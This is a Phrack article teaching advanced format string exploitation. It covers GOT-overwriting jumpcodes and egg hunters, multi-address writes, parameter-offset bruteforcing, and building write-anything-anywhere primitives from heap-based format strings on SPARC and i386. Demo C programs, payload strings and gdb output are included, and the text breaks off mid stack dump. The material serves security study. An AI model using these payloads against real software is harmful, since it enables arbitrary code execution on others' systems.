==Phrack Inc.==

                  0x0b, Issue 0x3b, Phile #0x07 of 0x12

|=-------------=[ Advances in format string exploitation ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=|


    1 - Intro

    Part I 
    2 - Bruteforcing format strings

    3 - 32*32 == 32 - Using jumpcodes 
      3.1 - write code in any known address
      3.2 - the code is somewhere else
      3.3 - friendly functions
      3.4 - no weird addresses 

    4 - n times faster
      4.1 - multiple address overwrite
      4.2 - multiple parameters bruteforcing

    Part II
    5 - Exploiting heap based format strings

    6 - the SPARC stack
    
    7 - the trick
      7.1 - example 1
      7.2 - example 2
      7.3 - example 3
      7.4 - example 4

    8 - building the 4-bytes-write-anything-anywhere primitive
      8.1 - example 5

    9 - the i386 stack
      9.1 - example 6
      9.2 - example 7 - the pointer generator

    10 - conclusions
      10.1 - is it dangerous to overwrite the l0 (on the stack frame) ?
      10.2 - is it dangerous to overwrite the ebp (on the stack frame) ?
      10.3 - is this reliable ?

    The End
    11 - more greets and thanks

    12 - References

--[ 1. Intro

   Is there anything else to say about format strings after all this time?
 probably yes, or at least we are trying... To start with, go get scut's
 excellent paper on format strings [1] and read it.

   This text deals with 2 different subjects. The first is about different
 tiny tricks that may help speeding up bruteforcing when exploiting format
 strings bugs, and the second is about exploting heap based format strings
 bugs.

   So fasten your seatbelts, the trip has just begun.


--[ Part I - by gera
--[ 2. Bruteforcing format strings

        "...Bruteforcing is not a very happy term, and doesn't make
        justice for a lot of exploit writers, as most of the time a
        lot of brain power is used to solve the problem in better
        ways than just brute force..."

    My greets to all those artists who inspired this phrase, specially
 ~{MaXX,dvorak,Scrippie}, scut[], lg(zip) and lorian+k.

--[ 3. 32*32 == 32 - Using jumpcodes 

    Ok, first things first...

    A format string lets you, after dealing with it, write what you want
where you want... I like to call this a write-anything-anywhere primitive,
and the trick described here can be used whenever you have a
write-anything-anywhere primitive, be it a format string, an overflow over
the "destination pointer of a strcpy()", several free()s in a row, a
ret2memcpy buffer overflow, etc.

    Scut[1], shock[2], and others[3][4] explain several methods to hook the
execution flow using a write-anything-anywhere primitive, namely changing
GOT, changing some function pointer, atexit() handlers, erm... a virtual
member of a class, etc.  When you do so, you need to know, guess or predict
2 different addresses: function pointer's address and shellcode's address,
each has 32 bits, and if you go blindly bruteforcing, you'll need to get 64
bits... well, this is not true, suppose GOT's address always starts with,
mmm... 0x0804 and that your code will be in, erm... 0x0805... ok, for linux
this may even be true, so it's not 64 bits, but 32 total, so it's just
4,294,967,296 tries...  well, no, because you may be able to provide a
cushion of 4K nops, so it goes down to 1,048,576 tries, and as GOT must be
walked on 4 bytes steps, it's just 262,144... heh, all theese numbers are
just... erm... nonsense.

    Well, sometimes there are other tricks you can do, use a read primitive
to learn something from the target process, or turn a write primitive into
a read primitive, or use more nops, or target stack or just hardcode some
addresses and go happy with it...

    But, there is something else you can do, as you are not limited to
writing only 4 bytes, you can write more than the address to the shellcode,
you can also write the shellcode!

----[ 3.1. write code in any known address

    Even with a single format string bug you can write not only more than
4, bytes, but you can also write them to different places in memory, so you
can choose any known to be writable and executable address, lets say,
0x8051234 (for some target program running on some linux), write some code
there, and change the function pointer (GOT, atexit()'s functions, etc) to
point it:


               GOT[read]:     0x8051234     ; of course using read is just
                                            ; an example

               0x8051234:     shellcode

    What's the difference? Well... shellcode's address is now known, it's
always 0x8051234, hence you only have to bruteforce function pointer's
address, cutting down the number of bits to 15 in the worst case.

    Ok, right, you got me... you cannot write a 200 bytes shellcode using
this technique with a format string (or can you?), maybe you can write a
30 bytes shellcode, but maybe you only have a few bytes... so, we need a
really small jumpcode for this to work.

----[ 3.2. the code is somewhere else

    I'm pretty sure you'll be able to put the code somewhere in target's
memory, in stack or in heap, or somewhere else (!?). If this is the case,
we need our jumpcode to locate the shellcode and jump there, what could
be really easy, or a little more tricky.

    If the shellcode is somewhere in stack (in the same format string
perhaps?) and if you can, more or less, know how far from the SP it will be
when the jumpcode is executed, you can jump relative to the SP with just 8
or 5 bytes:


              GOT[read]:      0x8051234

              0x8051234:      add $0x200, %esp   ; delta from SP to code
                              jmp *%esp          ; just use esp if you can

              esp+0x200:      nops...            ; just in case delta is
                                                 ; not really constant
                              real shellcode     ; this is not writen using
                                                 ; the format string

    Is the code in heap?, but you don't have the slightest idea where it
is? Just follow Kato (this version is 18 bytes, Kato's version is a little
longer, but only made of letters, he didn't use a format string though):

              GOT[read]:      0x8051234

              0x8051234:      cld
                              mov $0x4f54414a,%eax   ; so it doesn find
                              inc %eax               ; itself (tx juliano)
                              mov $0x804fff0, %edi   ; start searching low
                                                     ; in memory
                              repne scasl
                              jcxz .-2               ; keep searching!
                              jmp *$edi              ; upper case letters
                                                     ; are ok opcodes.

              somewhere
                in heap:      'KATO'            ; if you know the alignment
                              'KKATO'           ; one is enough, otherwise
                              'KKATO'           ; make some be found
                              'KKATO'
                              real shellcode
                                
    Is it in stack but you don't know where? (10 bytes)

              GOT[read]:      0x8051234

              0x8051234:      mov $0x4f54414a,%ebx   ; so it doesn find
                              inc %ebx               ; itself (tx juliano)
                              pop %eax
                              cmp %ebx, %eax
                              jnz .-3
                              jmp *$esp

              somewhere
               in stack:      'KATO'            ; you'll know the alignment
                              real shellcode

    Something else? ok, you figure your jumpcode yourself :-) But be
carefull!  'KATO' may not be a good string, as it's executed and has some
side effect. :-)
    You may even use a jumpcode which copies from stack to heap if the
stack is not executable but the heap is.

----[ 3.3. friendly functions

    When changing GOT you can choose what function pointer you want to use,
some functions may be better than others for some targets. For example, if
you know that after you changed the function pointer, the buffer containing
the shellcode will be free()ed, you can just do: (2 bytes)

              GOT[free]:      0x8051234          ; using free this time

              0x8051234:      pop %eax           ; discarding real ret addr
                              ret                ; jump to free's argument    
 
    The same may happen with read() if the same buffer with the shellcode
is reused to read more from the net, or syslog() or a lot of other
functions...  Sometimes you may need a jumpcode a little more complex if
you need to skip some bytes at the beggining of the shellcode:
(7 or 10 bytes)

              GOT[syslog]:    0x8051234          ; using syslog

              0x8051234:      pop %eax           ; discarding real ret addr
                              pop %eax
                              add $0x50, %eax    ; skip some non-code bytes
                              jmp *$eax

    And if nothing else works, but you can distinguish between a crash and
a hung, you can use a jumpcode with an infinite loop that will make the
target hung: You bruteforce GOT's address until the server hungs, then you
know you have the right address for some GOT entry that works, and you can
start bruteforcing the address for the real shellcode.

              GOT[exit]:      0x8051234

              0x8051234:      jmp .              ; infinite loop

----[ 3.4. no weird addresses 

    As I don't like choosing arbitrary addresses, like 0x8051234, what we
can do is something a little different:

              GOT[free]:      &GOT[free]+4       ; point it to next 4 bytes
                              jumpcode           ; address is &GOT[free]+4

    You don't really know GOT[free]'s address, but on every bruteforcing
step you are assuming you know it, then, you can make it point 4 bytes
ahead of it, where you can place the jumpcode, i.e. if you assume your
GOT[free] is at 0x8049094, your jumpcode will be at 0x8049098, then, you
have to write the value 0x8049098 to the address 0x8049094 and the
jumpcode to 0x8049098:

  /* fs1.c                                                   *
   * demo program to show format strings techinques          *
   * specially crafted to feed your brain by gera@corest.com */

  int main() {
    char buf[1000];

    strcpy(buf,
      "\x94\x90\x04\x08"          // GOT[free]'s address
      "\x96\x90\x04\x08"          // 
      "\x98\x90\x04\x08"          // jumpcode address (2 byte for the demo)
      "%.37004u"                  // complete to 0x9098 (0x9098-3*4)
      "%8$hn"                     // write 0x9098 to 0x8049094
      "%.30572u"                  // complete to 0x10804 (0x10804-0x9098)
      "%9$hn"                     // write 0x0804 to 0x8049096
      "%.47956u"                  // complete to 0x1c358 (0x1c358-0x10804)
      "%10$hn"                    // write 5B C3 (pop - ret) to 0x8049098
          );

    printf(buf);
  }

  gera@vaiolent:~/papers/gera$ make fs1
  cc     fs1.c   -o fs1

  gera@vaiolent:~/papers/gera$ gdb fs1
  
  (gdb) br main
  Breakpoint 1 at 0x8048439

  (gdb) r
  Breakpoint 1, 0x08048439 in main ()

  (gdb) n
  ...0000000000000...

  (gdb) x/x 0x8049094
  0x8049094:    0x08049098

  (gdb) x/2i 0x8049098
  0x8049098:    pop    %eax
  0x8049099:    ret    

    So, if the address of the GOT entry for free() is 0x8049094, the next
time free() is called in the program our little jumpcode will be called
instead.

    This last method has another advantage, it can be used not only on
format strings, where you can make every write to a different address, but
it can also be used with any write-anything-anywhere primitive, like a
"destination pointer of strcpy()" overwrite, or a ret2memcpy buffer
overflow. Or if you are as lucky [or clever] as lorian, you may even do
it with a single free() bug, as he teached me to do.

--[ 4. n times faster

----[ 4.1. multiple address overwrite

    If you can write more than 4 bytes, you can not only put the shellcode
or jumpcode where you know it is, you can also change several pointers at
the same time, speeding up things again.

    Of course this can be done, again, with any write-anything-anywhere
primitive which let's you write more than just 4 bytes, and, as we are
going to write the same values to all the pointers, there is a cheap way to
do it with format strings.

    Suppose we are using the following format string to write 0x12345678 at
the address 0x08049094:

    "\x94\x90\x04\x08"          // the address to write the first 2 bytes
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // the address for the next 2 bytes
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22076u"                  // complete to 0x5678 (0x5678-4-4-4-6*8)
    "%hn"                       // write 0x5678 to 0x8049094
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096

    As %hn does not add characters to the output string, we can write the
same value to several locations without having to add more padding. For
example, to turn this format string into one that writes the value
0x12345678 to 5 consecutive words starting in 0x8049094 we can use:

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22044u"                  // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
    "%hn"                       // write 0x5678 to 0x8049094
    "%hn"                       // write 0x5678 to 0x8049098
    "%hn"                       // write 0x5678 to 0x804909c
    "%hn"                       // write 0x5678 to 0x80490a0
    "%hn"                       // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096
    "%hn"                       // write 0x1234 to 0x804909a
    "%hn"                       // write 0x1234 to 0x804909e
    "%hn"                       // write 0x1234 to 0x80490a2
    "%hn"                       // write 0x1234 to 0x80490a6

    Or the equivalent using direct parameter access.

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%.22096u"                  // complete to 0x5678 (0x5678-5*4-5*4)
    "%8$hn"                     // write 0x5678 to 0x8049094
    "%9$hn"                     // write 0x5678 to 0x8049098
    "%10$hn"                    // write 0x5678 to 0x804909c
    "%11$hn"                    // write 0x5678 to 0x80490a0
    "%12$hn"                    // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%13$hn"                    // write 0x1234 to 0x8049096
    "%14$hn"                    // write 0x1234 to 0x804909a
    "%15$hn"                    // write 0x1234 to 0x804909e
    "%16$hn"                    // write 0x1234 to 0x80490a2
    "%17$hn"                    // write 0x1234 to 0x80490a6

    In this example, the number of "function pointers" to write at the same
time was set arbitrary to 5, but it could have been another number. The
real limit depends on the length of the string you can supply, how many
arguments you need to pop to get to the addresses if you are not using
direct parameter access, if there is a limit for direct parameters access
(on Solaris' libraries it's 30, on some Linuxes it's 400, and there may be
other variations), etc.

    If you are going to combine a jumpcode with multiple address overwrite,
you need to have in mind that the jumpcode will not be just 4 bytes after
the function pointer, but some more, depending on how many addresses you'll
overwrite at once.

----[ 4.2. multiple parameter bruteforcing

    Sometimes you don't know how many parameters you have to pop, or how
many to skip with direct parameter access, and you need to try until you
hit the right number. Sometimes it's possible to do it in a more
inteligent way, specially when it's not a blind format string (did I say
it already? go read scut's paper [1]!). But anyway, there may be cases
when you don't know how many parameters to skip, and have to find it out
trying, as in the next pythonish example:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08"        # GOT[free]'s address
      fstring += "\x96\x90\x04\x08"        # 
      fstring += "\x98\x90\x04\x08"        # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+1)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+2)      # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 1

    In this example, the variable 'pops' is incremented while trying to
hit the right number for direct parameter access. If we repeat the target
addresses, we can build a format string which lets us increment 'pops'
faster. For example, repeating each address 5 times we get a faster
bruteforcing:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08" * 5    # GOT[free]'s address
      fstring += "\x96\x90\x04\x08" * 5    # repeat eddress 5 times
      fstring += "\x98\x90\x04\x08" * 5    # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+6)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+11)     # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 5

    Hitting any of the 5 copies well be ok, the most copies you can put
the better.
    
    This is a simple idea, just repeat the addresses. If it's confusing,
grab pen and paper and make some drawings, first draw a stack with the
format string in it, and some random number of arguments on top of it, and
then start doing the bruteforcing manually... it'll be fun! I guarantee
it! :-)
    
    It may look stupid but may help you some day, you never know... and of
course the same could be done without direct parameter access, but it's a
little more complicated as you have to recalculate the length for %.u
format specifiers on every try.

--[ unnamed and unlisted seccion

    Through this text my only point was: a format string is more than a
mere 4-bytes-write-anything-anywhere primitive, it's almost a full
write-anything-anywhre primitive, which gives you more posibilities.

    So far so good, the rest is up to you...


--[ Part II - by riq
--[ 5. Exploiting heap based format strings

  Usually the format strings lies on the stack. But there are cases where
it is stored on the heap, and you CAN'T see it.

  Here I present a way to deal with these format strings in a generic way
within SPARC (and big-endian machines), and at the end we'll show you how
to do the same for little-endian machines.

--[ 6. The SPARC stack

  In the stack you will find stack frames. These stack frames have local 
variables, registers, pointers to previous stack frames, return addresses,
etc.

  Since with format strings we can see the stack, we are going to study
it more carefully.

  The stack frames in SPARC looks more or less like the following:


          frame 0              frame 1               frame 2
         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
         [  l1   ]     |      [  l1   ]      |      [  l1   ]
            ...        |         ...         |         ...   
         [  l7   ]     |      [  l7   ]      |      [  l7   ]
         [  i0   ]     |      [  i0   ]      |      [  i0   ]
         [  i1   ]     |      [  i1   ]      |      [  i1   ]
            ...        |         ...         |         ...   
         [  i5   ]     |      [  i5   ]      |      [  i5   ]
         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
         [  i7   ]            [  i7   ]             [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

  And so on...

  The fp register is a pointer to the caller frame pointer. As you may
guess, 'fp' means frame pointer.  

  The temp_N are local variables that are saved in the stack. The frame 1
starts where the frame 0's local variables end, and the frame 2 starts,
where the frame 1's local variables end, and so on.

  All these frames are stored in the stack. So we can see all of these
stack frames with our format strings.


--[ 7. the trick

  The trick lies in the fact that every stack frame has a pointer to the
previous stack frame. Furthermore, the more pointers to the stack we have,
the better.

  Why ? Because if we have a pointer to our own stack, we can overwrite the
address that it points to with any value.


--[ 7.1. example 1

 Suppose that we want to put the value 0x1234 in frame 1's l0. What we will
try to do is to build a format string, whose length is 0x1234, by the time
we've reached stack frame 0's fp with a %n.

  Supposing that the first argument that we see is the frame 0's l0
register, we should have a format string like the following (in python):

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 'i' registers
  '%4640d'  +     # modify the length of my string (4640 is 0x1220) and...
  '%n'            # I write where fp is pointing (which is frame 1's l0)


  So, after the format string has been executed, our stack should look like
this:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x00001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]


--[ 7.2. example 2

  If we decided on a bigger number, like 0x20001234, we should find 2
pointers that point to the same address in the stack. It should be
something like this:

          frame 0              frame 1 
         [  l0   ]     +----> [  l0   ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

  [ Note: We are not going to find always 2 pointers that point to the same
address, though it is not rare. ]

  So, our format string should look like this:

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 registers 'i'
  '%4640d'  +     # modify the length of my format string (4640 is 0x1220)
  '%n'            # I write where fp is pointing (which is frame 1's l0)
  '%3530d'  +     # again, I modify the length of the format string
  '%hn'           # and I write again, but only the hi part this time!

  And we would get the following:
          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]


--[ 7.3. example 3

  In the case that we only have 1 pointer, we can get the same result by
using the 'direct parameter access' in the format string, with
%argument_number$, where 'argument_number' is a number between 0 and 30
(in Solaris).

  My format string should be the following:
    '%4640d' +  # change the length
    '%15$n'  +  # I write where argument 15 is pointing (arg 15 is fp!)
    '%3530d' +  # change the length again
    '%15$hn'    # write again, but only the hi part!

  Therefore, we would arrive at the same result:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

--[ 7.4. example 4

  But it could well happen that I don't have 2 pointers that point to the
same address in the stack, and the first address that points to the stack
is outside the scope of the first 30 arguments. What could I then do ?

  Remember that with plain '%n', you can write very large numbers, like
0x00028000 and higher. You should also keep in mind that the binary's PLT
is usually located in very low addresses, like 0x0002????. So, with just
one pointer that points to the stack, you can get a pointer that points to
the binary's PLT.

  I don't believe a graphic is necessary in this example.


--[ 8. builind the 4-bytes-write-anything-anywhere primitive

--[ 8.1. example 5

  In order to get a 4-bytes-write-anything-anywhere primitive we should
repeat what was done with the stack frame 0, and do it again for another
stack frame, like frame 1. Our result should look something like the
following:

      frame 0              frame 1               frame 2
     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
     [  l1   ]     |      [  l1   ]      |      [  l1   ]
        ...        |         ...         |         ...   
     [  l7   ]     |      [  l7   ]      |      [  l7   ]
     [  i0   ]     |      [  i0   ]      |      [  i0   ]
     [  i1   ]     |      [  i1   ]      |      [  i1   ]
        ...        |         ...         |         ...   
     [  i5   ]     |      [  i5   ]      |      [  i5   ]
     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
     [  i7   ]            [  i7   ]      |      [  i7   ]
     [ temp 1]            [ temp 1]      |
                          [ temp 2]  ----+
                          [ temp 3]

  [Note: As long as the code we want to change is located in 0x00029e8c ]

  So, now that we have 2 pointers, one that points to 0x00029e8c and
another that points to 0x00029e8e, we have finally achieved our goal! Now,
we can exploit this situation just like any other format string
vulnerability :)

  The format string will look like this:

    '%4640d' +  # change the length
    '%15$n'  +  # with 'direct parameter access' I write the lower part
                # of frame 1's l0
    '%3530d' +  # change the length again
    '%15$hn' +  # overwrite the higher part
    '%9876d' +  # change the length
    '%18$hn' +  # And write like any format string exploit!


    '%8x' * 13+ # pop 13 arguments (from argument 15)
    '%6789d' +  # change length
    '%n'     +  # write lower part
    '%8x'    +  # pop
    '%1122d' +  # modify length
    '%hn'    +  # write higher part
    '%2211d' +  # modify length
    '%hn'       # And write, again, like any format string exploit.


  As you can see, this was done with just one format string. But this is
not always possible. If we can't build 2 pointers, what we need to do, is
to abuse the format string twice.

  First, we build a pointer that points to 0x00029e8c. Then, we overwrite
the value that 0x00029e8c points to with '%hn'.
 
  The second time in which we abuse of the format string, we do the same as
we did before, but with a pointer to 0x00029e8e. There is no real need for
two pointers (0x00029e8c and 0x00029e8e), as writing first the lower part
with %n and then the higher part with %hn will work, but you'll have to use
the same pointer twice, only possible with direct parameter access.

--[ 9. the i386 stack 

  We can also, exploit a heap based format strings in the i386 arquitecture
using a very similar technique. Lets see how the i386 stack works.

        frame 0        frame 1        frame 2        frame 3
       [  ebp  ] ---> [  ebp  ] ---> [  ebp  ] ---> [  ebp  ]
       [       ]      [       ]      [       ]      [       ]
       [       ]      [       ]      [       ]      [       ]
       [ ...   ]      [ ...   ]      [ ...   ]      [ ...   ]

  As you can see, i386's stack is very similar to SPARC's, the main
difference is that all the addresses are stored in little-endian format.

         frame0           frame1
        [ LSB | MSB ] ---> [ LSB | MSB ] 
        [           ]      [           ] 

  So, the trick we were using in SPARC of overwriting address's LSB
with '%n', and then overwriting its MSB with '%hn' with just one pointer
won't work in this architecture.

  We need an additional pointer, pointing to MSB's address, in order to
change it. Something like this:

                    +----------------------------+
                    |                            |
                    |                            V
       [LSB | MSB]  |   [LSB | MSB] ---> [LSB | MSB]
       [         ]  |   [         ]      [         ]
       [         ] -+   [         ]      [         ]
       [  ...    ]      [   ...   ]      [   ...   ]
         Frame B          Frame C          Frame D

  Heh! as you probably guessed, this is not very common on everyday stacks,
so, what we are going to do, is build the pointers we need, and then, of
course, use them.

  Warning! We just found out that this technique does not work on latest
Linuxes, we are not even sure if works on any (it depends on libc/glibc
version), but we know it works, at least, on OpenBSD, FreeBSD and Solaris
x86). 

--[ 9.1. example 6

  This trick will need an aditional frame... latter we'll try to get rid
of as many frames as possible.
  
                                 +----------------------------+
                                 |                            |
                                 |                            V
   [LSB | MSB] ---> [LSB | MSB] -+   [LSB | MSB] ---> [LSB | MSB]
   [         ]      [         ]      [         ]      [         ]
   [         ]      [         ]      [         ]      [         ]
   [  ...    ]      [  ...    ]      [   ...   ]      [   ...   ]
     Frame A          Frame B          Frame C          Frame D

  Frame A has a pointer to Frame B. Specifically, it's pointing to Frame
B's ebp. So we can modify the LSB of Frame B's ebp, with an '%hn'. And that
is what we wanted!. Now Frame B is not pointing to Frame C, but to the MSB
of Frame D's ebp.

  We are abusing the fact that ebp is already pointing to the stack, and we
assume that changing its 2 LSB will be enough to make it point to another
frame's saved ebp. There may be some problems with this (if Frame D is
not on the same 64k "segment" of Frame C), but we'll get rid of this
problem in the following examples.

  So with 4 stack frames, we could build one pointer in the stack, and with
that pointer we could write 2 bytes anywhere in memory. If we have 8 stack
frames we could repeat the process and build 2 pointers in the stack,
allowing us to write 4 bytes anywhere in memory.

--[ 9.2. example 7 - the pointer generator

  There are cases where you don't have 8 (or 4) stack frames. What can we
do then? Well, using direct parameter access, we could use just 3 stack
frames to do everything, and not only a 4-bytes-write-anything-anywhere
primitive but almost a full write-anything-anywhere primitive.

Lets see how we can do it, heavily abusing direct parameter access,
our target? to build the address 0xdfbfddf0 in the stack, so we can use it
latter with another %hn to write there.

step 1:

  Frame B's saved frame pointer (saved ebp) is already pointing to Frame
C's saved ebp, so, the first thing we are going to do is change Frame's C
LSB:

         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ LSB | MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C
  
  Since we know where in the stack is Frame B, we could use direct
parameter access to access parameters out of order... and probably not
just once. Latter we'll see how to find the direct parameter access number
we need, right now lets just assume Frame B's is 14.

                 # step 1
    '%.56816u' + # change the length (we want to write 0xddf0)
    '%14$hn'   + # Write where argument 14 is pointing
                 # (arg 14 is Frame B's ebp)

  What we get is a modified Frame C's ebp.

step 2:
         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C

  As Frame A's ebp is already pointing to Frame B's ebp, we can use it to
change the LSB of Frame B's ebp, and as it is already pointing to Frame C's
ebp's LSB we can make it point to Frame C's ebp's MSB, we won't have the
64k segments problem this time, as Frame C's ebp's LSB must be in the same
segment as its MSB, as it's always 4 bytes aligned... I know it's
confusing...
  For example if Frame C is at 0xdfbfdd6c, we will want to make Frame B's
ebp to point to 0xdfbfdd6e, so we can write target address' MSB.

                # step 2
    '%.65406u'+ # we want to write 0xdd6e (65406 = 0x1dd6e-0xddf0)
    '%6$hn'   + # Write where argument 6 is pointing
                # (assuming arg 6 is Frame A's ebp)

step 3:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  The new Frame B points to the MSB of the Frame C's ebp. And now, with 
another direct parameter access, we build the MSB of the address that we
were looking for.

                # step 3
    '%.593u'  + # we want to write 0xdfbf (593 = 0xdfbf - 0xdd6e)
    '%14$n'   + # Write where argument 14 is pointing
                # (arg 14 is Frame B's ebp)


our result:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| dfbf]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  As you can see, we have our pointer in Frame C's ebp, now we could use it
to write 2 bytes anywhere in memory. This won't be enough normally to make
an exploit, but we could use the same trick, USING THESE 3 STACK FRAMES
AGAIN, to build another pointer (and another, and another...)
Hey, we've found a pointer generator :-) with only 3 stack frames.

  Got the theory? let's put all this together in an example.

  The following code will use 3 frames (A,B,C) and multiple parameters
access to write the value 0xaabbccdd to the address 0xdfbfddf0. It was
tested on an OpenBSD 3.0, and can be tried on other systems.  We'll show
you here how to tune it to your box.

  /* fs2.c                                                   *
   * demo program to show format strings techinques          *
   * specially crafted to feed your brain by gera@corest.com */

  do_printf(char *msg) {
    printf(msg);
  }
  
  #define FrameC 0xdfbfdd6c
  #define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a) 
  
  char *write_two_bytes(
      unsigned long where, 
      unsigned short what, 
      int restoreFrameB)
  {
    static char buf[1000]={0};    // enough? sure! :)
    static int a,b=0;
  
    if (restoreFrameB)
      sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff)));
    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where & 0xffff));
    sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff) + 2));
    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where >> 0x10));
    sprintf(buf, "%s%%.%du%%29$hn", buf, counter(what));
    return buf;
  }
  
  int main() {
    char *buf;
    buf = write_two_bytes(0xdfbfddf0,0xccdd,0);
    buf = write_two_bytes(0xdfbfddf2,0xaabb,1);
    do_printf(buf);
  }

  The values you'll need to change are:

    %6$         number of parameter for Frame A's ebp
    %14$        number of parameter for Frame B's ebp
    %29$        number of parameter for Frame C's ebp
    0xdfbfdd6c  address of Frame C's ebp

  To get the right values:

gera@vaiolent> cc -o fs fs.c
gera@vaiolent> gdb fs
(gdb) br do_printf
(gdb) r
(gdb) disp/i $pc
(gdb) ni
(gdb) p "run until you get to the first call in do_printf"
(gdb) ni
1: x/i $eip  0x17a4 <do_printf+12>:     call   0x208c <_DYNAMIC+140>
(gdb) bt
#0  0x17a4 in do_printf ()
#1  0x1968 in main ()
(gdb) x/40x $sp
0xdfbfdcf8:     0x000020d4      0xdfbfdd70      0xdfbfdd00      0x0000195f
0xdfbfdd08:     0xdfbfddf2      0x0000aabb     [0xdfbfdd30]--+ (0x00001968)
0xdfbfdd18:     0x000020d4      0x0000ccdd      0x00000000   |  0x00001937
0xdfbfdd28:     0x00000000      0x00000000   +-[0xdfbfdd6c]<-+  0x0000109c
0xdfbfdd38:     0x00000001      0xdfbfdd74   |  0xdfbfdd7c      0x00002000
0xdfbfdd48:     0x0000002f      0x00000000   |  0x00000000      0xdfbfdff0
0xdfbfdd58:     0x00000000      0x0005a0c8   |  0x00000000      0x00000000
